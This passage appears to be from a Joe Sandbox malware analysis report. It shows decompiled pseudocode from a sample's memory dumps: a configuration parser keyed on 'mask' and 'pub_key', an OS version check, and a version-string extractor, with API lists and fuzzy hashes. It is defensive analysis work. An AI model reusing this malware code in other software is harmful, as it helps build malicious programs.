                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                    • String ID:
                                    • API String ID: 511007297-0
                                    • Opcode ID: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
                                    • Instruction ID: 811f56816fac90b3f697cb9b47ea68c04c6809e84355938d8d5aa19c9def892c
                                    • Opcode Fuzzy Hash: 09f10d3b3c259155b6958d15611f55180743da09de1cb546d5ae490d8b099b59
                                    • Instruction Fuzzy Hash: 5711E9304041547ED7102F68D548BE67F58FF02B21F944526E8C6FB302C779A4578761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F5833E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                    				int* _v8;
                                    				void* _t8;
                                    				char _t10;
                                    				void* _t14;
                                    				void* _t15;
                                    				char _t18;
                                    				char _t19;
                                    				int _t20;
                                    				CHAR* _t23;
                                    				CHAR* _t26;
                                    				CHAR* _t35;
                                    				CHAR* _t40;
                                    
                                    				_push(__ecx);
                                    				_t26 = _a4;
                                    				_t37 = __ecx;
                                    				_v8 = __ecx;
                                    				__ecx[3] = _t26;
                                    				_t8 = E0F5832B0(__ecx);
                                    				if(_t8 == 0 || _t8 == 0xffffffff) {
                                    					ExitProcess(0);
                                    				}
                                    				if(E0F583320(__ecx) == 0) {
                                    					 *__ecx = 0;
                                    					_t10 =  *_t26;
                                    					if(_t10 == 0) {
                                    						goto L4;
                                    					} else {
                                    						do {
                                    							if(_t10 == 0x7b) {
                                    								_t26 =  &(_t26[1]);
                                    								_t14 = E0F583190(_t26);
                                    								if(_t14 != 0) {
                                    									_t15 = _t14 - 1;
                                    									if(_t15 == 0) {
                                    										E0F583200(_t37, _t26, 1);
                                    									} else {
                                    										if(_t15 == 1) {
                                    											_t18 =  *_t26;
                                    											_t35 = _t26;
                                    											if(_t18 == 0) {
                                    												L15:
                                    												_t19 =  *_t35;
                                    												if(_t19 != 0x7d) {
                                    													_t40 = _t35;
                                    													if(_t19 != 0) {
                                    														while( *_t40 != 0x7d) {
                                    															_t40 =  &(_t40[1]);
                                    															if( *_t40 != 0) {
                                    																continue;
                                    															} else {
                                    															}
                                    															goto L21;
                                    														}
                                    														 *_t40 = 0;
                                    													}
                                    													L21:
                                    													_t20 = lstrlenA(_t35);
                                    													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                    													 *(_v8 + 8) = _t23;
                                    													if(_t23 != 0) {
                                    														lstrcpyA(_t23, _t35);
                                    													}
                                    													 *_t40 = 0x7d;
                                    													_t37 = _v8;
                                    												}
                                    											} else {
                                    												while(_t18 != 0x7d) {
                                    													_t35 =  &(_t35[1]);
                                    													if(_t18 == 0x3d) {
                                    														goto L15;
                                    													} else {
                                    														_t18 =  *_t35;
                                    														if(_t18 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L15;
                                    														}
                                    													}
                                    													goto L25;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    							L25:
                                    							_t7 =  &(_t26[1]); // 0x97850fe0
                                    							_t10 =  *_t7;
                                    							_t26 =  &(_t26[1]);
                                    						} while (_t10 != 0);
                                    						return 1;
                                    					}
                                    				} else {
                                    					 *__ecx = 1;
                                    					L4:
                                    					return 1;
                                    				}
                                    			}















                                    0x0f5833e3
                                    0x0f5833e5
                                    0x0f5833e9
                                    0x0f5833eb
                                    0x0f5833ee
                                    0x0f5833f1
                                    0x0f5833f8
                                    0x0f5834db
                                    0x0f5834db
                                    0x0f583410
                                    0x0f583425
                                    0x0f58342b
                                    0x0f58342f
                                    0x00000000
                                    0x0f583431
                                    0x0f583432
                                    0x0f583434
                                    0x0f58343a
                                    0x0f583441
                                    0x0f583444
                                    0x0f58344a
                                    0x0f58344b
                                    0x0f5834ba
                                    0x0f58344d
                                    0x0f58344e
                                    0x0f583450
                                    0x0f583452
                                    0x0f583456
                                    0x0f583467
                                    0x0f583467
                                    0x0f58346b
                                    0x0f58346d
                                    0x0f583471
                                    0x0f583473
                                    0x0f583478
                                    0x0f58347c
                                    0x00000000
                                    0x00000000
                                    0x0f58347e
                                    0x00000000
                                    0x0f58347c
                                    0x0f583480
                                    0x0f583480
                                    0x0f583483
                                    0x0f583484
                                    0x0f583495
                                    0x0f58349e
                                    0x0f5834a3
                                    0x0f5834a7
                                    0x0f5834a7
                                    0x0f5834ad
                                    0x0f5834b0
                                    0x0f5834b0
                                    0x00000000
                                    0x0f583458
                                    0x0f58345c
                                    0x0f58345f
                                    0x00000000
                                    0x0f583461
                                    0x0f583461
                                    0x0f583465
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f583465
                                    0x00000000
                                    0x0f58345f
                                    0x0f583458
                                    0x0f583456
                                    0x0f58344e
                                    0x0f58344b
                                    0x0f583444
                                    0x0f5834bf
                                    0x0f5834bf
                                    0x0f5834bf
                                    0x0f5834c2
                                    0x0f5834c3
                                    0x0f5834d6
                                    0x0f5834d6
                                    0x0f583412
                                    0x0f583412
                                    0x0f583418
                                    0x0f583422
                                    0x0f583422

                                    APIs
                                      • Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,00000000,?,0F585444,?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000), ref: 0F5832C5
                                      • Part of subcall function 0F5832B0: lstrlenA.KERNEL32(?,?,0F5833F6,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5832EE
                                    • lstrlenA.KERNEL32(0F585445,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F583484
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F58348E
                                    • HeapAlloc.KERNEL32(00000000,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F583495
                                    • lstrcpyA.KERNEL32(00000000,0F585445,?,0F585444,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5834A7
                                    • ExitProcess.KERNEL32 ref: 0F5834DB
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                    • String ID:
                                    • API String ID: 1867342102-0
                                    • Opcode ID: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
                                    • Instruction ID: 5393b5967fb15e5b77a6371f14ce5878435e1c365e4656408ba4f444b5118171
                                    • Opcode Fuzzy Hash: 2cb9ae02c7b91c7aba9ed2e52654505e02047253668d4aa199c3f186de03da39
                                    • Instruction Fuzzy Hash: B3310570504A456AEB223F68C44C7F57F54BB42B10F9841BAE8C5FB2A3D76E68478760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _memset.LIBCMT ref: 0F583D42
                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
                                    • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
                                    • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$InfoVerifyVersion_memset
                                    • String ID:
                                    • API String ID: 3299124433-0
                                    • Opcode ID: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
                                    • Instruction ID: 6c2f69a5d26e00a9762ce04fae090be22d89df6d8b210bb27d6dc0145c04b085
                                    • Opcode Fuzzy Hash: 5098bf79b92310458a44c74fadc14e4466f8ffa0986609baf8a66ddad1a9261f
                                    • Instruction Fuzzy Hash: 2F1112B0D4031C7EEB619F64DC0ABEA7BBCEB08700F004195A508F61C1D6B95B548FD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F584EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                    				CHAR* _v8;
                                    				char _v12;
                                    				char _v20;
                                    				char _t16;
                                    				char _t20;
                                    				char _t21;
                                    				intOrPtr* _t24;
                                    				intOrPtr _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr* _t29;
                                    				CHAR* _t33;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				void* _t38;
                                    				void* _t41;
                                    				intOrPtr* _t42;
                                    				void* _t47;
                                    				void* _t49;
                                    				intOrPtr* _t51;
                                    				CHAR* _t53;
                                    
                                    				asm("movq xmm0, [0xf58faac]");
                                    				_t16 =  *0xf58fab4; // 0x0
                                    				_t29 = _a4;
                                    				_v8 = __edx;
                                    				_t51 = __ecx;
                                    				asm("movq [ebp-0x10], xmm0");
                                    				_v12 = _t16;
                                    				if( *_t29 == 0) {
                                    					L11:
                                    					if(_t51 == 0) {
                                    						goto L10;
                                    					} else {
                                    						if(_v20 == 0) {
                                    							L22:
                                    							if(_t51 == 0) {
                                    								goto L10;
                                    							} else {
                                    								_t53 = _t51 + lstrlenA( &_v20);
                                    								while(1) {
                                    									_t20 =  *_t53;
                                    									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                    										break;
                                    									}
                                    									_t53 =  &(_t53[1]);
                                    								}
                                    								_t33 = _t53;
                                    								while(1) {
                                    									_t21 =  *_t33;
                                    									if(_t21 < 0x30 || _t21 > 0x39) {
                                    										goto L30;
                                    									}
                                    									L31:
                                    									_t33 =  &(_t33[1]);
                                    									continue;
                                    									L30:
                                    									if(_t21 == 0x2e) {
                                    										goto L31;
                                    									}
                                    									 *_t33 = 0;
                                    									return lstrcpyA(_v8, _t53);
                                    									goto L33;
                                    								}
                                    							}
                                    						} else {
                                    							_t34 =  *_t51;
                                    							if(_t34 != 0) {
                                    								_t47 = _t51 -  &_v20;
                                    								do {
                                    									_t24 =  &_v20;
                                    									if(_t34 == 0) {
                                    										L19:
                                    										if( *_t24 == 0) {
                                    											goto L22;
                                    										} else {
                                    											goto L20;
                                    										}
                                    									} else {
                                    										while(1) {
                                    											_t35 =  *_t24;
                                    											if(_t35 == 0) {
                                    												goto L22;
                                    											}
                                    											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                    											if(_t41 != 0) {
                                    												goto L19;
                                    											} else {
                                    												_t24 = _t24 + 1;
                                    												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                    													continue;
                                    												} else {
                                    													goto L19;
                                    												}
                                    											}
                                    											goto L33;
                                    										}
                                    										goto L22;
                                    									}
                                    									goto L33;
                                    									L20:
                                    									_t34 =  *((intOrPtr*)(_t51 + 1));
                                    									_t51 = _t51 + 1;
                                    									_t47 = _t47 + 1;
                                    								} while (_t34 != 0);
                                    							}
                                    							goto L10;
                                    						}
                                    					}
                                    				} else {
                                    					_t25 =  *__ecx;
                                    					if(_t25 == 0) {
                                    						L10:
                                    						return lstrcpyA(_v8, "fabian wosar <3");
                                    					} else {
                                    						_t49 = __ecx - _t29;
                                    						do {
                                    							_t42 = _t29;
                                    							if(_t25 == 0) {
                                    								L8:
                                    								if( *_t42 == 0) {
                                    									goto L11;
                                    								} else {
                                    									goto L9;
                                    								}
                                    							} else {
                                    								while(1) {
                                    									_t26 =  *_t42;
                                    									if(_t26 == 0) {
                                    										goto L11;
                                    									}
                                    									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                    									if(_t38 != 0) {
                                    										goto L8;
                                    									} else {
                                    										_t42 = _t42 + 1;
                                    										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                    											continue;
                                    										} else {
                                    											goto L8;
                                    										}
                                    									}
                                    									goto L33;
                                    								}
                                    								goto L11;
                                    							}
                                    							goto L33;
                                    							L9:
                                    							_t25 =  *((intOrPtr*)(_t51 + 1));
                                    							_t51 = _t51 + 1;
                                    							_t49 = _t49 + 1;
                                    						} while (_t25 != 0);
                                    						goto L10;
                                    					}
                                    				}
                                    				L33:
                                    			}























                                    0x0f584ea6
                                    0x0f584eae
                                    0x0f584eb4
                                    0x0f584eb9
                                    0x0f584ebc
                                    0x0f584ec1
                                    0x0f584ec6
                                    0x0f584ec9
                                    0x0f584f1a
                                    0x0f584f1c
                                    0x00000000
                                    0x0f584f1e
                                    0x0f584f22
                                    0x0f584f5f
                                    0x0f584f61
                                    0x00000000
                                    0x0f584f63
                                    0x0f584f6d
                                    0x0f584f70
                                    0x0f584f70
                                    0x0f584f74
                                    0x00000000
                                    0x00000000
                                    0x0f584f7a
                                    0x0f584f7a
                                    0x0f584f7d
                                    0x0f584f80
                                    0x0f584f80
                                    0x0f584f84
                                    0x00000000
                                    0x00000000
                                    0x0f584f8e
                                    0x0f584f8e
                                    0x00000000
                                    0x0f584f8a
                                    0x0f584f8c
                                    0x00000000
                                    0x00000000
                                    0x0f584f95
                                    0x0f584fa4
                                    0x00000000
                                    0x0f584fa4
                                    0x0f584f80
                                    0x0f584f24
                                    0x0f584f24
                                    0x0f584f28
                                    0x0f584f2f
                                    0x0f584f31
                                    0x0f584f31
                                    0x0f584f36
                                    0x0f584f4f
                                    0x0f584f52
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584f38
                                    0x0f584f38
                                    0x0f584f38
                                    0x0f584f3c
                                    0x00000000
                                    0x00000000
                                    0x0f584f45
                                    0x0f584f47
                                    0x00000000
                                    0x0f584f49
                                    0x0f584f49
                                    0x0f584f4d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584f4d
                                    0x00000000
                                    0x0f584f47
                                    0x00000000
                                    0x0f584f38
                                    0x00000000
                                    0x0f584f54
                                    0x0f584f54
                                    0x0f584f57
                                    0x0f584f58
                                    0x0f584f59
                                    0x0f584f5d
                                    0x00000000
                                    0x0f584f28
                                    0x0f584f22
                                    0x0f584ecb
                                    0x0f584ecb
                                    0x0f584ecf
                                    0x0f584f05
                                    0x0f584f19
                                    0x0f584ed1
                                    0x0f584ed3
                                    0x0f584ed5
                                    0x0f584ed5
                                    0x0f584ed9
                                    0x0f584ef7
                                    0x0f584efa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584edb
                                    0x0f584ee0
                                    0x0f584ee0
                                    0x0f584ee4
                                    0x00000000
                                    0x00000000
                                    0x0f584eed
                                    0x0f584eef
                                    0x00000000
                                    0x0f584ef1
                                    0x0f584ef1
                                    0x0f584ef5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584ef5
                                    0x00000000
                                    0x0f584eef
                                    0x00000000
                                    0x0f584ee0
                                    0x00000000
                                    0x0f584efc
                                    0x0f584efc
                                    0x0f584eff
                                    0x0f584f00
                                    0x0f584f01
                                    0x00000000
                                    0x0f584ed5
                                    0x0f584ecf
                                    0x00000000

                                    APIs
                                    • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F5851ED), ref: 0F584F0D
                                    • lstrlenA.KERNEL32(00000000,?,0F5851ED), ref: 0F584F67
                                    • lstrcpyA.KERNEL32(?,?,?,0F5851ED), ref: 0F584F98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: fabian wosar <3
                                    • API String ID: 367037083-1724090804
                                    • Opcode ID: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
                                    • Instruction ID: d9b35829451fd4d31406d3ed64547f20581a92da1a4b9f184b729a44e9cba122
                                    • Opcode Fuzzy Hash: ee5f67d4a8da7a1e21080e4d8712276d4c58a5ef008175b37af3526b31fee9ae
                                    • Instruction Fuzzy Hash: 493103218082A75ADB22EE2854503FABFA1BF43211F9851EDDCD5BB307D3615447C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F583190(CHAR* _a4) {
                                    				char _t6;
                                    				CHAR* _t13;
                                    				CHAR* _t16;
                                    
                                    				_t13 = _a4;
                                    				_t16 = _t13;
                                    				if( *_t13 == 0) {
                                    					L5:
                                    					lstrcmpiA(_t13, "mask");
                                    					_t10 =  ==  ? 1 : 0;
                                    					lstrcmpiA(_a4, "pub_key");
                                    					 *_t16 = 0x3d;
                                    					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					return  ==  ? 2 :  ==  ? 1 : 0;
                                    				} else {
                                    					while(1) {
                                    						_t6 =  *_t16;
                                    						if(_t6 == 0x7d) {
                                    							break;
                                    						}
                                    						if(_t6 == 0x3d) {
                                    							 *_t16 = 0;
                                    							goto L5;
                                    						} else {
                                    							_t16 =  &(_t16[1]);
                                    							if( *_t16 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    						goto L8;
                                    					}
                                    					return 0;
                                    				}
                                    				L8:
                                    			}






                                    0x0f583193
                                    0x0f583197
                                    0x0f58319c
                                    0x0f5831b0
                                    0x0f5831b9
                                    0x0f5831ce
                                    0x0f5831d1
                                    0x0f5831d9
                                    0x0f5831e1
                                    0x0f5831e4
                                    0x0f5831e9
                                    0x0f5831a0
                                    0x0f5831a0
                                    0x0f5831a0
                                    0x0f5831a4
                                    0x00000000
                                    0x00000000
                                    0x0f5831a8
                                    0x0f5831ec
                                    0x00000000
                                    0x0f5831aa
                                    0x0f5831aa
                                    0x0f5831ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f5831ae
                                    0x00000000
                                    0x0f5831a8
                                    0x0f5831f5
                                    0x0f5831f5
                                    0x00000000

                                    APIs
                                    • lstrcmpiA.KERNEL32(0F585444,mask,0F585445,?,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831B9
                                    • lstrcmpiA.KERNEL32(0F585444,pub_key,?,0F583441,0F585445,00000000,00000000,00000000,?,?,0F585444,00000000), ref: 0F5831D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi
                                    • String ID: mask$pub_key
                                    • API String ID: 1586166983-1355590148
                                    • Opcode ID: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
                                    • Instruction ID: 85da7ed5d81de2fe1a2b3a3d45e16c5e199c81a0ecb1df7bb91ee0197f6ee925
                                    • Opcode Fuzzy Hash: 74e08ff8f6eb92781eca81078024d7b71b36a7e29bfee0a36dc9fac493765134
                                    • Instruction Fuzzy Hash: 66F046723082845EF7155A689C457E1BFC8AB45F10F94047FE6CAE6242C2AA98838350
                                    Uniqueness

                                    Uniqueness Score: -1.00%